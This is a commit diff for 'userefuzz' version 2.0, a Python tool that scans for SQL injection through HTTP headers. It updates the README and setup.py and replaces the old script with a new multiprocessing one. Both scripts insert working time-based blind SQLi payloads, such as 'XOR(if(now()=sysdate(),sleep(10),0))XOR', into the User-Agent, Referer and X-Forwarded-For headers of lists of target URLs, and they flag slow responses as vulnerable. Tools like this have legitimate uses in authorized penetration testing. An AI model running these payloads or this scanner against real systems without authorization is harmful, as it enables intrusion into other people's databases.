STRLCPY/userefuzz

Userefuzz 2.0
root-tanishq committed 1 year ago

f543780b

1 parent d641404a

■ ■ ■ ■ ■ ■

README.md

1	1		<p align="center">
2		-	<img src="https://github.com/root-tanishq/userefuzz/blob/main/images/logo.png" width=20%>
	2	+	<img src="https://github.com/root-tanishq/userefuzz/blob/main/images/userefuzz_icon.png">
3	3		</p>
4	4		<h1 align="center">
5		-	<b>UseReFuzz</b>
	5	+
	6	+	[![PYPI](https://img.shields.io/badge/PYPI-UseReFuzz-orange)](https://pypi.org/project/userefuzz/)
	7	+	[![MIT](https://img.shields.io/github/license/root-tanishq/userefuzz)](https://github.com/root-tanishq/userefuzz/blob/main/LICENSE)
	8	+	[![Version](https://img.shields.io/badge/Latest--Version-2.0-brightgreen)](#)
	9	+	[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/root_tanishq.svg?style=social&label=Follow%20%40root_tanishq)](https://twitter.com/root_tanishq) <br />
	10	+	[![Youtube](https://img.shields.io/youtube/channel/subscribers/UC0HLRnmOx3x_hsAGAdG9VaQ?style=social)](https://www.youtube.com/@boyfromfuture69)
	11	+	[![Github](https://img.shields.io/github/stars/root-tanishq/userefuzz?style=social)](https://github.com/root-tanishq/userefuzz/stargazers)
	12	+	[![Expy](https://img.shields.io/badge/Author-Tanishq%20Rathore-blue)](https://expy.bio/tanishq)
6	13		</h1>
7	14
	15	+	<h3 align="center">
	16	+
8	17		User-Agent , X-Forwarded-For and Referer SQLI Fuzzer made with `python`<br/>
9	18		Works on `linux`, `Windows` and `MacOS` based systems<br />
	19	+	</h3>
10	20
11		-	[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/root_tanishq.svg?style=social&label=Follow%20%40root_tanishq)](https://twitter.com/root_tanishq)<br />
	21	+	<h2><b>Legal Disclaimer</h2></b>
12	22
13		-	<h2><b>Legal Disclaimer</h2></b>
14	23		Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
15	24		<br />
16		-	<h3><b>Installation</b></h3><br/>
	25	+
	26	+	<h2><b>Installation</b></h2><br/>
17	27
18	28		- pip
19	29
20	30		```sh
21		-	sudo pip3 install userefuzz
	31	+	pip install userefuzz
22	32		```
23		-	- setup (Recommended)
	33	+	> It will be installed by the name `userefuzz.py`
	34	+
	35	+
	36	+	- setup
24	37
25	38		```sh
26	39		git clone https://github.com/root-tanishq/userefuzz
27	40		cd userefuzz
28	41		python3 setup.py install
29	42		```
	43	+	> It will be installed by the name `userefuzz.py`
30	44
31		-	- kunto
	45	+	<h2><b>Usage</b></h2><br/>
	46	+
	47	+	<h3><b>Parsing a list of URLs</b></h2><br/>
	48	+
	49	+	```sh
	50	+	userefuzz -l <URL LIST>
	51	+	```
	52	+
	53	+	![list](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_parse_list.png)<br />
	54	+
	55	+	<h3><b>Parsing a URL</b></h2><br/>
32	56
33	57		```sh
34		-	kunto install userefuzz
	58	+	userefuzz -u <URL>
35	59		```
36		-	- [linux standalone](https://github.com/root-tanishq/userefuzz/releases/download/UserReFuzz_standalone_binaries/userefuzz-1.1.1-linux.zip)
37	60
38		-	- [Windows standalone](https://github.com/root-tanishq/userefuzz/releases/download/UserReFuzz_standalone_binaries/userefuzz-1.1.1-win.zip)
	61	+	![url](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_url.png)<br />
39	62
40		-	<h3><b>Usage</b></h3><br/>
	63	+	<h3><b>Parsing stdin</b></h2><br/>
	64	+
	65	+	```sh
	66	+	<SOME COMMANDS> \| userefuzz
	67	+	```
	68	+
	69	+	![stdin](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_stdin.png)<br />
	70	+
	71	+	<h3><b>Verbose Output</b></h2><br/>
	72	+
	73	+	```sh
	74	+	userefuzz <LIST / URL> -v
	75	+	```
	76	+
	77	+	![vb](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_verbose.png)<br />
41	78
42		-	- Parsing A List of URLS
	79	+	<h3><b>Multi Processing</b></h2><br/>
43	80
44	81		```sh
45		-	userefuzz -l <URL LIST>
	82	+	userefuzz <LIST / URL> -w <WORKER COUNT>
46	83		```
47		-	![list](https://github.com/root-tanishq/userefuzz/blob/main/images/parse_a_list.png)<br />
	84	+
	85	+	> 1 Worker Took 23 secs
	86	+
	87	+	![w1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_worker1.png)<br />
	88	+
	89	+	> 10 Worker Took 20 secs
	90	+
	91	+	![w1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_worker10.png)<br />
48	92
49		-	- Setup proxy for vulnerable requests
	93	+	<h3><b>Proxy Interception of Vulnerable Requests</b></h2><br/>
50	94
51	95		```sh
52		-	userefuzz -l <URL LIST> -p 'http://127.1:8080'
	96	+	userefuzz <LIST / URL> -p <YOUR PROXY>
53	97		```
54		-	![proxy](https://github.com/root-tanishq/userefuzz/blob/main/images/proxy_setup.png)<br />
55	98
56		-	![burp_proxy](https://github.com/root-tanishq/userefuzz/blob/main/images/proxy_setup_burp.png)<br />
	99	+	![proxy](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_proxy.png)<br />
	100	+
	101	+	<h3><b>Custom Message in request</b></h2><br/>
	102	+
	103	+	```sh
	104	+	userefuzz <LIST / URL> -m <MESSAGE>
	105	+	```
57	106
58		-	- Custom Message
	107	+	![msg](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_message.png)<br />
59	108
60		-	> Custom messages can be send with header for ease of sorting requerts in burpsuite
	109	+	<h3><b>Custom Payload with custom sleep</b></h2><br/>
61	110
62	111		```sh
63		-	userefuzz -l <URL LIST> -p 'http://127.1:8080' -m '<Custom Message Here>'
	112	+	userefuzz <LIST / URL> -i <CUSTOM SQLI PAYLOAD> -s <SLEEP COUNT IN THE PAYLOAD>
64	113		```
65	114
66		-	![message](https://github.com/root-tanishq/userefuzz/blob/main/images/custom_message.png)<br />
	115	+	![inject](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_inject.png)<br />
	116	+
	117	+	<h3><b>Custom Header Injection</b></h2><br/>
	118	+
	119	+	```sh
	120	+	userefuzz <LIST / URL> -ch <CUSTOM HEADER NAME>
	121	+	```
67	122
68		-	![burp_message](https://github.com/root-tanishq/userefuzz/blob/main/images/custom_message_burp.png)<br />
	123	+	![ch](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_header.png)<br />
69	124
70		-	- Custom Payload Injection
	125	+	<h3><b>Output</b></h2><br/>
71	126
72	127		```sh
73		-	userefuzz -l <URL LIST> -i '<CUSTOM SQLI PAYLOAD>' -s <SLEEP ACCORDING TO PAYLOAD>
	128	+	userefuzz <LIST / URL> -o <OUTPUT FILE NAME WITHOUT EXT>
74	129		```
75	130
76		-	![inject](https://github.com/root-tanishq/userefuzz/blob/main/images/custom_inject.png)<br />
	131	+	![o1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_out1.png)<br />
	132	+
	133	+	> Output File
	134	+
	135	+	![o1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_out2.png)<br />
	136	+
	137	+	<h3><b>Telegram Notifications of Vulnerable Requests with Telify</b></h2><br/>
77	138
	139	+	> The Tool uses [Telify](https://github.com/root-tanishq/telify) configuration file for sending notification .So inorder to use this feature you need to setup telify
78	140
	141	+	```sh
	142	+	userefuzz <LIST / URL> -t
	143	+	```
	144	+
	145	+	![t](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_telify.png)<br />

■ ■ ■ ■ ■ ■

pypi.md

1	+	<p align="center">
2	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/userefuzz_icon.png">
3	+	</p>
4	+	<h1 align="center">
5	+	<b>UseReFuzz</b>
6	+	</h1>
7	+
8	+	> User-Agent , X-Forwareded-For , Referer and other http headers SQLI Fuzzer
9	+
10	+	- [USAGE of UseReFuzz](https://github.com/root-tanishq/userefuzz)
11	+

■ ■ ■ ■ ■ ■

setup.py

1	1		from setuptools import setup
2	2
3	3		def readme():
4		-	with open('README.md') as f:
	4	+	with open('pypi.md') as f:
5	5		return f.read()
6	6
7	7		setup(
8	8		name='userefuzz',
9		-	version='1.1.1',
	9	+	version='2.0.2',
10	10		long_description=readme(),
11	11		long_description_content_type="text/markdown",
12	12		description='User-Agent and Referer Header SQLI Fuzzer',
		skipped 1 lines
14	14		author='Tanishq Rathore',
15	15		license='MIT',
16	16		packages=['userefuzz'],
17		-	scripts=['userefuzz/userefuzz'],
	17	+	scripts=['userefuzz/userefuzz.py'],
18	18		install_requires=['requests'],
19	19
20	20		classifiers=[
		skipped 1 lines
22	22		],
23	23		)
24	24
25		-

■ ■ ■ ■ ■ ■

userefuzz/userefuzz

1	-	#!/usr/bin/env python3
2	-	# Author = Tanishq Rathore (Kun)
3	-	# V = 1.0.0
4	-
5	-	# Importing
6	-	import requests
7	-	import argparse
8	-	import urllib3
9	-	import urllib
10	-	import threading
11	-
12	-
13	-
14	-	# For SSL issues
15	-	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16	-
17	-	# Colors
18	-	class bcolors:
19	-	HEADER = '\033[95m'
20	-	OKBLUE = '\033[94m'
21	-	OKCYAN = '\033[96m'
22	-	OKGREEN = '\033[92m'
23	-	WARNING = '\033[93m'
24	-	FAIL = '\033[91m'
25	-	ENDC = '\033[0m'
26	-	BOLD = '\033[1m'
27	-	UNDERLINE = '\033[4m'
28	-
29	-
30	-	# Banner
31	-	banner=f"""{bcolors.OKBLUE}
32	-	_____
33	-	__ __ ______ ___________ _____/ ____\_ __________________
34	-	\| \| \/ ___// __ \_ __ \_/ __ \ __\ \| \___ /\___ /
35	-	\| \| /\___ \\\\ ___/\| \| \/\ ___/\| \| \| \| // / / /
36	-	\|____//____ >\___ >__\| \___ >__\| \|____//_____ \/_____ \\
37	-	\/ \/ \/ \/ \/
38	-
39	-	[ 💉💉💉 {bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]
40	-
41	-	😍 {bcolors.BOLD}Made with ❤️ By [🤵 Tanishq Rathore] Kun 🐱‍🚀 {bcolors.OKBLUE}
42	-	»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»{bcolors.ENDC}{bcolors.BOLD}
43	-	🌟 {bcolors.WARNING}STAR ❯ https://github.com/root-tanishq/userefuzz
44	-	🐦 {bcolors.WARNING}Twitter ❯ https://twitter.com/root_tanishq{bcolors.OKBLUE}{bcolors.BOLD}
45	-	»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
46	-	{bcolors.ENDC}"""
47	-	print(banner)
48	-
49	-	# Arguments
50	-	parser = argparse.ArgumentParser()
51	-	parser.add_argument('-l','--list', type=argparse.FileType('r'),help='📄_List of URL to check for User-Agent and Referer SQL Injection \n \t -l urllist.txt',required=True)
52	-	parser.add_argument('-p','--proxy', type=str,help='✈️ _Burp proxy or any other proxy to send the request \n \t -p http://127.0.0.1:9090',default="no-proxy")
53	-	parser.add_argument('-m','--message', type=str,help='✉️ _Send a message in header for ease of search in Burp history \n \t -m "Just Testing SQLI"',default="Testing for SQLI in User-Agent and Referer Header")
54	-	parser.add_argument('-i','--inject', type=str,help="""💉_Send your custom payload for SQL Injection \n \t -m "'+sleep(10)+'" \n \t By default the best are used""" , default="default-payload")
55	-	parser.add_argument('-s','--sleep', type=int,help="""😴_How much sleep is used in your custom payload \n \t -s 12 """ , default=10)
56	-	args = parser.parse_args()
57	-
58	-
59	-	# Creating a session for requests
60	-	def sqli_request(url):
61	-	if args.inject == "default-payload":
62	-	try:
63	-	s = requests.Session()
64	-	headers = {"User-Agent": '"XOR(if(now()=sysdate(),sleep(10),0))XOR"' ,"Referer" : "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z","X-Forwarded-For":"0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" ,"Useref":args.message}
65	-	burp_proxy={"http":args.proxy, "https":args.proxy}
66	-	testrequest = s.get(url , headers=headers , verify=False )
67	-	sleeptestrequest = testrequest.elapsed.total_seconds()
68	-	if sleeptestrequest >= 10:
69	-	if args.proxy != "no-proxy":
70	-	try:
71	-	ogrequest = s.get(url , headers=headers , proxies=burp_proxy , verify=False , timeout=0.000000000001)
72	-	except:
73	-	pass
74	-	print(f"{bcolors.OKGREEN}💉💉 URL : [ ", url , " ] \t \t \t Time Taken: [ ",sleeptestrequest ,f" ]{bcolors.ENDC}")
75	-	else:
76	-	print(f"{bcolors.FAIL}URL : [ ", url , " ] \t \t \t Time Taken: [ ",sleeptestrequest ,f" ]{bcolors.ENDC}")
77	-	except KeyboardInterrupt:
78	-	exit(0)
79	-	except:
80	-	print(f"{bcolors.FAIL}Error in : [", url , f"]{bcolors.ENDC}")
81	-	else:
82	-	try:
83	-	s = requests.Session()
84	-	headers = {"User-Agent": args.inject ,"Referer" : args.inject, "X-Forwarded-For": args.inject,"Useref":args.message}
85	-	burp_proxy={"http":args.proxy, "https":args.proxy}
86	-	testrequest = s.get(url , headers=headers , verify=False )
87	-	sleeptestrequest = testrequest.elapsed.total_seconds()
88	-	if sleeptestrequest >= args.sleep:
89	-	if args.proxy != "no-proxy":
90	-	try:
91	-	ogrequest = s.get(url , headers=headers , proxies=burp_proxy , verify=False ,timeout=0.000000001)
92	-	except:
93	-	pass
94	-	print(f"{bcolors.OKGREEN}💉💉 URL : [ ", url , " ] \t \t \t Time Taken: [ ",sleeptestrequest ,f" ]{bcolors.ENDC}")
95	-	else:
96	-	print(f"{bcolors.FAIL}URL : [ ", url , " ] \t \t \t Time Taken: [ ",sleeptestrequest ,f" ]{bcolors.ENDC}")
97	-	except KeyboardInterrupt:
98	-	exit(0)
99	-	except:
100	-	print(f"{bcolors.FAIL}Error in : [", url , f"]{bcolors.ENDC}")
101	-
102	-	# Crearing a threading process
103	-	def Userefuzz_main(url2):
104	-	t = threading.Thread(target=sqli_request(url2))
105	-	t.start()
106	-
107	-	# Opening the list of URL file
108	-	urlfile = args.list.read()
109	-	urltestlist = urlfile.split("\n")
110	-	urllist = filter(None , urltestlist)
111	-	# Main requests loop
112	-	def main():
113	-	for url1 in urllist:
114	-	Userefuzz_main(url1)
115	-
116	-
117	-
118	-	# Calling main function
119	-	main()
120	-

■ ■ ■ ■ ■ ■

userefuzz/userefuzz.py

1	+	#!/usr/bin/env python3
2	+	# Author = Tanishq Rathore (Kun)
3	+	# V = 2.0.0
4	+
5	+	import requests
6	+	import argparse
7	+	import urllib3
8	+	import multiprocessing as mp
9	+	import sys
10	+	import os
11	+	import datetime
12	+	import configparser
13	+
14	+	# Disable warning regarding ssl
15	+	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16	+
17	+	# Colour Checking
18	+	if os.name != 'nt':
19	+	class bcolors:
20	+	HEADER = '\033[95m'
21	+	OKBLUE = '\033[94m'
22	+	OKCYAN = '\033[96m'
23	+	OKGREEN = '\033[92m'
24	+	WARNING = '\033[93m'
25	+	FAIL = '\033[91m'
26	+	ENDC = '\033[0m'
27	+	BOLD = '\033[1m'
28	+	UNDERLINE = '\033[4m'
29	+	SLANT = '\x1B[3m'
30	+	else:
31	+	class bcolors:
32	+	HEADER = ''
33	+	OKBLUE = ''
34	+	OKCYAN = ''
35	+	OKGREEN = ''
36	+	WARNING = ''
37	+	FAIL = ''
38	+	ENDC = ''
39	+	BOLD = ''
40	+	UNDERLINE = ''
41	+	SLANT = ''
42	+	print("USEREFUZZ \| Colouring is disable as Windows OS is detected")
43	+
44	+
45	+	# Banner
46	+	banner=f"""
47	+	{bcolors.FAIL} ( (
48	+	{bcolors.WARNING} )\ {bcolors.FAIL}) ){bcolors.WARNING}\ )
49	+	( ({bcolors.FAIL} (()/( ( ({bcolors.WARNING}(){bcolors.FAIL}/( {bcolors.WARNING}(
50	+	)\ ( ){bcolors.FAIL})\ /(_))){bcolors.WARNING})\ /(_)){bcolors.FAIL}))\ ({bcolors.WARNING} (
51	+	_ ((_))\ /{bcolors.FAIL}((_\|_)) /{bcolors.WARNING}((_\|_{bcolors.FAIL}))_/((_{bcolors.WARNING}))\ )\ {bcolors.OKBLUE}
52	+	\| \| \| ((_\|_)) \| _ (_)) \| \|_(_))(((_\|(_)
53	+	\| \|_\| (_-< -_)\| / -_)\| __\| \|\| \|_ /_ /
54	+	\___//__\|___\|\|_\|_\___\|\|_\| \_,_/__/__\| {bcolors.SLANT}{bcolors.UNDERLINE}V 2.0.0{bcolors.ENDC}
55	+
56	+	{bcolors.OKBLUE}
57	+	[ 💉💉💉 {bcolors.ENDC}{bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]{bcolors.ENDC}
58	+	"""
59	+
60	+	print(banner)
61	+
62	+	# Arguments
63	+	parser = argparse.ArgumentParser()
64	+	parser.add_argument('-l','--list', type=str,help=f'📄_List of URL to check for Header SQL Injection \t \t {bcolors.BOLD} {bcolors.OKBLUE}-l urllist.txt{bcolors.ENDC}',default="NO_LIST")
65	+	parser.add_argument('-p','--proxy', type=str,help=f'✈️ _Burp proxy or any other proxy to send the request \t \t{bcolors.BOLD} {bcolors.OKBLUE} -p http://127.1:8080{bcolors.ENDC}',default="NO_PROXY")
66	+	parser.add_argument('-m','--message', type=str,help=f'✉️ _Send a message in header for ease of search in Burp history \t \t{bcolors.BOLD} {bcolors.OKBLUE} -m "Just Testing SQLI"{bcolors.ENDC}',default="Testing for SQLI in User-Agent and Referer Header")
67	+	parser.add_argument('-s','--sleep', type=int,help=f'😴_How much sleep is used in your custom payload \t \t{bcolors.BOLD} {bcolors.OKBLUE} -s 12 {bcolors.ENDC} Default Sleep = 10' , default=10)
68	+	parser.add_argument('-v','--verbose', help=f'💣_Display All URLs and output \t \t{bcolors.BOLD} {bcolors.OKBLUE} -v {bcolors.ENDC}', action='store_true' , default=False)
69	+	parser.add_argument('-t','--telify', help=f'💬_Notify on telegram (https://github.com/root-tanishq/telify configuration file required) \t \t{bcolors.BOLD} {bcolors.OKBLUE} -t {bcolors.ENDC}', action='store_true' , default=False)
70	+	parser.add_argument('-o','--output', type=str,help=f'📁_Save the vulnerable URLs to an output file \t \t{bcolors.BOLD} {bcolors.OKBLUE} -o savefile {bcolors.ENDC}', default="NO_OUTPUT")
71	+	parser.add_argument('-u','--url', type=str,help=f'🤖_Pass a URL to check for Header SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -u http://domain.tld/index.php {bcolors.ENDC}', default='NO_URL')
72	+	parser.add_argument('-ch','--customerheader', type=str,help=f'🔒_Custom Header for SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -ch X-Auth {bcolors.ENDC}', default="NO_CUSTOM_HEADER")
73	+	parser.add_argument('-w','--workers', type=int,help=f'👷_No. of workers (Processes) at a time \t \t{bcolors.BOLD} {bcolors.OKBLUE}-w 10 {bcolors.ENDC}\t \t Default Workers = 5',default=5)
74	+	parser.add_argument('-i','--inject', type=str,help=f"""💉_Send your custom payload for SQL Injection \t \t{bcolors.BOLD} {bcolors.OKBLUE} -i "'+sleep(10)+'"{bcolors.ENDC} """ , default='"XOR(if(now()=sysdate(),sleep(10),0))XOR"')
75	+	args = parser.parse_args()
76	+
77	+	if args.telify:
78	+	try:
79	+	config = configparser.ConfigParser()
80	+	config.read(os.path.join(os.path.expanduser( '~' ),'telify.ini'))
81	+	CHAT_ID = config['TELIFY']['CHATID']
82	+	API_TOKEN = config['TELIFY']['APITOKEN']
83	+	telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage'
84	+	requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💡] (USEREFUZZ) Runned on (⏲️) {datetime.datetime.now()} ⏬'})
85	+	except:
86	+	print(f"😺{bcolors.WARNING}_No Configuration found , setup telify now => {bcolors.ENDC}{bcolors.BOLD} https://github.com/root-tanishq/telify {bcolors.ENDC}")
87	+
88	+	if args.output != "NO_OUTPUT":
89	+	print(f'{bcolors.BOLD} 📂 Logging Output of Vulnerable URLs to => {args.output}.md \n')
90	+	file = open(args.output + ".md","w")
91	+	file.write(f"""
92	+	# UseReFuzz HEADER SQLI INJECTION REPORT
93	+
94	+	## Author - Tanishq Rathore (Kun)
95	+	## Github - https://github.com/root-tanishq/userefuzz
96	+	## Twitter - https://twitter.com/root_tanishq
97	+
98	+	> UseReFuzz runned on `{datetime.datetime.now()}`
99	+
100	+	## Legality
101	+
102	+	```
103	+	Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
104	+	```
105	+
106	+	- Payload Used `{args.inject}`
107	+
108	+	- Sleep used for checking `{args.sleep}`
109	+
110	+	# Report Results
111	+	\| TIME TAKEN \| URL \| IS VULNERABLE \|
112	+	\| --- \| --- \| --- \|
113	+	""")
114	+	file.close()
115	+	fileappend = open(args.output + ".md" , "a")
116	+
117	+	def header_injector(url):
118	+	if args.customerheader != 'NO_CUSTOM_HEADER':
119	+	header = { args.customerheader : args.inject , 'UseReFuzz':args.message }
120	+	else:
121	+	header = {'User-Agent':args.inject , 'Referer': args.inject , 'X-Forwarded-For':args.inject , 'UseReFuzz':args.message }
122	+	proxy = { 'http': args.proxy , 'https': args.proxy }
123	+	sess = requests.Session()
124	+	resp = sess.get(url , headers=header , verify=False)
125	+	resp_time = resp.elapsed.total_seconds()
126	+	try:
127	+	if resp_time >= args.sleep-1:
128	+	if args.proxy != 'NO_PROXY':
129	+	try:
130	+	sess.get(url , headers=header , verify=False , proxies=proxy , timeout=0.000000000001)
131	+	except:
132	+	pass
133	+	print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉P{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url)
134	+	else:
135	+	print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉💉{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url)
136	+	if args.output != "NO_OUTPUT":
137	+	fileappend.write(f'\| {resp_time} \| "{url}" \| 💉True \|\n')
138	+	fileappend.flush()
139	+	if args.telify:
140	+	telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage'
141	+	requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💎] (USEREFUZZ)⛓️URL(💻)⛓️ {url} ⛓️RESPONSE TIME(⏲️)⛓️ {resp_time}'})
142	+	else:
143	+	if args.verbose:
144	+	print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url)
145	+	if args.output != "NO_OUTPUT":
146	+	fileappend.write(f'\| {resp_time} \| "{url}" \| False \|\n')
147	+	fileappend.flush()
148	+	except:
149	+	if args.verbose:
150	+	print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url)
151	+	if args.output != "NO_OUTPUT":
152	+	fileappend.write(f'\| {resp_time} \| "{url}" \| False \|\n')
153	+	fileappend.flush()
154	+
155	+
156	+	def main():
157	+	if args.url != "NO_URL":
158	+	header_injector(args.url)
159	+	elif args.list != "NO_LIST":
160	+	try:
161	+	urllist = filter(None , open(args.list,'r').read().split("\n"))
162	+	with mp.Pool(args.workers) as worker:
163	+	worker.map(header_injector , urllist)
164	+	except KeyboardInterrupt:
165	+	exit(0)
166	+	except:
167	+	if os.path.isfile(args.list):
168	+	exit(0)
169	+	else:
170	+	print(f'😥{bcolors.BOLD}{bcolors.FAIL}_We are unable to read the file or the file does not exist{bcolors.ENDC}')
171	+	elif not sys.stdin.isatty():
172	+	try:
173	+	urlfile = []
174	+	for line in sys.stdin:
175	+	try:
176	+	urlfile.append(line.split()[0])
177	+	except:
178	+	pass
179	+	with mp.Pool(args.workers) as worker:
180	+	worker.map(header_injector , urlfile)
181	+	except KeyboardInterrupt:
182	+	exit(0)
183	+	except:
184	+	exit(0)
185	+	else:
186	+	print(f"😺{bcolors.WARNING}_No Option Provided please check {bcolors.ENDC}{bcolors.BOLD}# {sys.argv[0]} --help {bcolors.ENDC}")
187	+	if args.output != "NO_OUTPUT":
188	+	fileappend.close()
189	+
190	+
191	+	main()
192	+

Userefuzz 2.0